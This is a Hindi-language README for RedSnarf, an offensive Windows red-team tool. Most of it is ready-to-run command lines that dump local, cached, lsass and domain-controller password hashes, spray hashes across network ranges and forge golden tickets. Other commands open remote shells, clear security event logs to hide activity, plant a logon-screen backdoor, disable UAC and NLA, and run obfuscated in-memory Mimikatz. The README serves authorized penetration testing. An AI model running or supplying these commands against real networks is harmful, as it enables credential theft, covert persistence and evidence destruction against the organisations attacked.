
RedSnarf एक pen-testing / red-teaming टूल है जो Windows वातावरण के लिए है।
______ .____________ _____
______ \ ____ | / / ____ _____ ____/ \
| // __ \ / __ |_ \ / \ \ __ \ __\
| | \ __// // |/ \ | / __ | | /| |
|| /_ >_ /_______ /_| (__ /| ||
/ / / / / /
[email protected]
@redsnarf
RedSnarf एक पेन-टेस्टिंग / रेड-टीमिंग टूल है, जिसे एड विलियम्स द्वारा बनाया गया है। यह OpSec सुरक्षित तकनीकों का उपयोग करके विंडोज वर्कस्टेशन, सर्वर और डोमेन कंट्रोलर से हैश और क्रेडेंशियल प्राप्त करने के लिए है।
वीडियो के लिए हमारा YouTube चैनल देखें https://www.youtube.com/channel/UCDGWRxpHo6d8y6qIeMAXnxQ
RedSnarf की कार्यक्षमता में शामिल हैं:
• स्थानीय SAM हैश प्राप्त करना
• उन्नत सिस्टम विशेषाधिकारों के साथ चल रहे उपयोगकर्ताओं और उनके संबंधित lsa secrets पासवर्ड की गणना करना;
• MS कैश्ड क्रेडेंशियल प्राप्त करना;
• Pass-the-hash;
• कमजोर और अनुमान लगाने योग्य उपयोगकर्ता नाम/पासवर्ड संयोजनों की त्वरित पहचान (डिफ़ॉल्ट administrator/Password01);
• एक सीमा पर हैश प्राप्त करने की क्षमता;
• Hash spraying -
Credsfile pwdump, fgdump और स्पेस से अलग किए गए सादे टेक्स्ट उपयोगकर्ता नाम और पासवर्ड के मिश्रण को स्वीकार करेगा;
• Mimikatz के साथ ऑफलाइन विश्लेषण के लिए Lsass डंप;
• NTDSUtil का उपयोग करके डोमेन कंट्रोलर हैश डंप करना और स्थानीय पार्सिंग के लिए NTDS.dit प्राप्त करना;
• drsuapi विधि का उपयोग करके डोमेन कंट्रोलर हैश डंप करना;
• डोमेन कंट्रोलर से Scripts और Policies फोल्डर प्राप्त करना और 'password' और 'administrator' के लिए पार्स करना;
• cpassword हैश को डिक्रिप्ट करने की क्षमता;
• रिमोट मशीन पर शेल शुरू करने की क्षमता;
• इवेंट लॉग (application, security, setup या system) को साफ करने की क्षमता; (केवल आंतरिक संस्करण)
• विश्लेषण के लिए परिणाम प्रति-होस्ट आधार पर सहेजे जाते हैं।
• रिमोट मशीन पर RDP सक्षम/अक्षम करें।
• रिमोट मशीन पर RDP पोर्ट 3389 से 443 में बदलें।
• रिमोट मशीन पर NLA सक्षम/अक्षम करें।
• पता लगाएं कि उपयोगकर्ता रिमोट मशीनों पर कहाँ लॉग इन हैं।
• Windows लॉगऑन स्क्रीन में बैकडोर डालें
• रिमोट मशीन पर UAC सक्षम/अक्षम करें।
• स्टील्थ mimikatz जोड़ा गया।
• डोमेन हैश का पार्सिंग
• यह निर्धारित करने की क्षमता कि कौन से खाते सक्षम/अक्षम हैं
• रिमोट लॉग ऑन एक्टिव यूजर के डेस्कटॉप का स्क्रीनशॉट लें
• रिमोट लॉग ऑन एक्टिव यूजर के डेस्कटॉप को रिकॉर्ड करें
• Windows CPassword डिक्रिप्ट करें
• WinSCP पासवर्ड डिक्रिप्ट करें
• उपयोगकर्ता SPN प्राप्त करें
• रिमोट मशीनों से WIFI पासवर्ड प्राप्त करें
आवश्यकताएँ:
Impacket v0.9.16-dev - https://github.com/CoreSecurity/impacket.git
CredDump7 - https://github.com/Neohapsis/creddump7
Lsass प्राप्त करने के लिए procdump - https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
Netaddr (0.7.12) - pip install netaddr
Termcolor (1.1.0) - pip install termcolor
iconv - स्थानीय रूप से Mimikatz जानकारी पार्स करने में उपयोग किया जाता है
सहायता दिखाएँ
./redsnarf.py -h
./redsnarf.py --help
एकल मशीन से कमजोर स्थानीय क्रेडेंशियल का उपयोग करके और Security इवेंट लॉग को साफ करते हुए स्थानीय हैश प्राप्त करें
./redsnarf.py -H ip=10.0.0.50 -uC security
एकल मशीन से कमजोर स्थानीय क्रेडेंशियल का उपयोग करके और application इवेंट लॉग को साफ करते हुए स्थानीय हैश प्राप्त करें
./redsnarf.py -H ip=10.0.0.50 -uC application
एकल मशीन से स्थानीय व्यवस्थापक क्रेडेंशियल का उपयोग करके स्थानीय हैश प्राप्त करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d .
एकल मशीन से डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके स्थानीय हैश प्राप्त करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com
नेटवर्क रेंज पर स्थानीय व्यवस्थापक क्रेडेंशियल का उपयोग करके हैश प्राप्त करें
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d .
नेटवर्क रेंज पर डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके हैश प्राप्त करें
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com
नेटवर्क रेंज पर डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके हैश प्राप्त करें
./redsnarf.py -H file=targets.txt -u administrator -p Password01 -d yourdomain.com
नेटवर्क रेंज पर हैश स्प्रे करें
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d .
नेटवर्क रेंज पर डोमेन लॉगिन के साथ हैश प्राप्त करें
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d yourdomain.com
क्रेडेंशियल की त्वरित जाँच करें
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password1 -d . -cQ y
उपयोगकर्ता नामों वाली फाइल (-hS) और एक सामान्य पासवर्ड (-hP) की त्वरित जाँच करें
./redsnarf.py -H ip=10.0.0.1 -hS /path/to/usernames.txt -hP PasswordToTry -cQ y
drsuapi विधि का उपयोग करके हैश प्राप्त करें (सबसे तेज़)
यह विधि एक वैकल्पिक फ्लैग -q y का समर्थन करती है जो LDAP को क्वेरी करेगा और आउटपुट देगा कि खाते सक्रिय हैं या अक्षम
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hI y (-hQ y)
NTDSUtil का उपयोग करके हैश प्राप्त करें
यह विधि एक वैकल्पिक फ्लैग -q y का समर्थन करती है जो LDAP को क्वेरी करेगा और आउटपुट देगा कि खाते सक्रिय हैं या अक्षम
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hN y (-hQ y)
गोल्डन टिकट उत्पन्न करना
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hT y
डोमेन कंट्रोलर से Policies और Scripts फोल्डर कॉपी करें और password और administrator के लिए पार्स करें
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -uP y
Cpassword डिक्रिप्ट करें
./redsnarf.py -uG cpassword
उपयोगकर्ता ढूँढें - लाइव
/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eL user.name
उपयोगकर्ता ढूँढें - ऑफलाइन (पहले से डाउनलोड की गई जानकारी खोजता है)
/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eO user.name
NT AUTHORITY\SYSTEM टास्कलिस्ट प्रदर्शित करें
/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eT y
रिमोट लॉग ऑन एक्टिव यूजर के डेस्कटॉप का स्क्रीनशॉट लें
/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eS y
स्थानीय व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर शेल शुरू करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -uD y
डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर शेल शुरू करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uD y
Mimikatz के साथ ऑफलाइन पार्सिंग के लिए lsass की एक कॉपी प्राप्त करें - स्थानीय व्यवस्थापक क्रेडेंशियल का उपयोग करके
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -hL y
स्टील्थ mimikatz चलाएं, यह विकल्प एक वेब-सर्वर शुरू करता है जो एक powershell स्क्रिप्ट प्रदान करता है, यह मशीन साइड पर अस्पष्ट और एन्कोडेड होता है, डेटा डिस्क को नहीं छूता - क्रेडेंशियल को आसानी से पढ़ने योग्य शैली में grep किया जाता है और स्क्रीन पर इको किया जाता है।
./redsnarf.py -H ip=192.168.198.162 -u administrator -p Password01 -cS y -hR y
कस्टम कमांड चलाएं
उदाहरण 1
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'net user'
उदाहरण 2 - डबल कोट्स को \ से एस्केप करना होगा
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'dsquery group -name "domain admins" | dsget group -members -expand'
स्थानीय एक्सेस टोकन नीति
lat.bat नामक एक बैच फाइल बनाता है जिसे आप रिमोट मशीन पर कॉपी और पेस्ट करके निष्पादित कर सकते हैं, जो रजिस्ट्री को संशोधित करेगा और स्थानीय एक्सेस टोकन नीति सेटिंग्स को सक्षम या अक्षम करेगा।
./redsnarf.py -rL y
Wdigest
डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर UseLogonCredential Wdigest रजिस्ट्री मान सक्षम करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW e
डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर UseLogonCredential Wdigest रजिस्ट्री मान अक्षम करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW d
डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर UseLogonCredential Wdigest रजिस्ट्री मान क्वेरी करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW q
UAC
डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर UAC रजिस्ट्री मान सक्षम करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU e
डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर UAC रजिस्ट्री मान अक्षम करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU d
डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर UAC रजिस्ट्री मान क्वेरी करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU q
बैकडोर - बैकडोर Windows स्क्रीन - सक्रिय करने के लिए Left Shift + Left Alt + Print Screen दबाएँ
डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर बैकडोर रजिस्ट्री मान सक्षम करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB e
डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर बैकडोर रजिस्ट्री मान अक्षम करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB d
डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर बैकडोर रजिस्ट्री मान क्वेरी करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB q
AutoLogon
डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर Windows AutoLogon रजिस्ट्री मान सक्षम करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA e
डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर Windows AutoLogon रजिस्ट्री मान अक्षम करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA d
डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर Windows AutoLogon रजिस्ट्री मान क्वेरी करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA q
डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके रिमोट मशीन उपयोगकर्ता सत्र को लॉक करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uL y
डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर RDP सक्षम करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR e
डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर RDP अक्षम करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR d
डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर RDP स्थिति क्वेरी करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR q
RDP पोर्ट 3389 से 443 में बदलें - डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर RDP पोर्ट 443 में बदलें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT e
डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर RDP पोर्ट डिफ़ॉल्ट 3389 पर बदलें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT d
डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर RDP पोर्ट मान क्वेरी करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT q
Mimikatz के साथ मल्टी-RDP सक्षम करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uR y
डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर RDP SingleSessionPerUser सक्षम करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM e
डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर RDP SingleSessionPerUser अक्षम करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM d
डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर RDP SingleSessionPerUser स्थिति क्वेरी करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM q
डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर NLA सक्षम करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN e
डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर NLA अक्षम करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN d
डोमेन व्यवस्थापक क्रेडेंशियल का उपयोग करके मशीन पर NLA स्थिति क्वेरी करें
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN q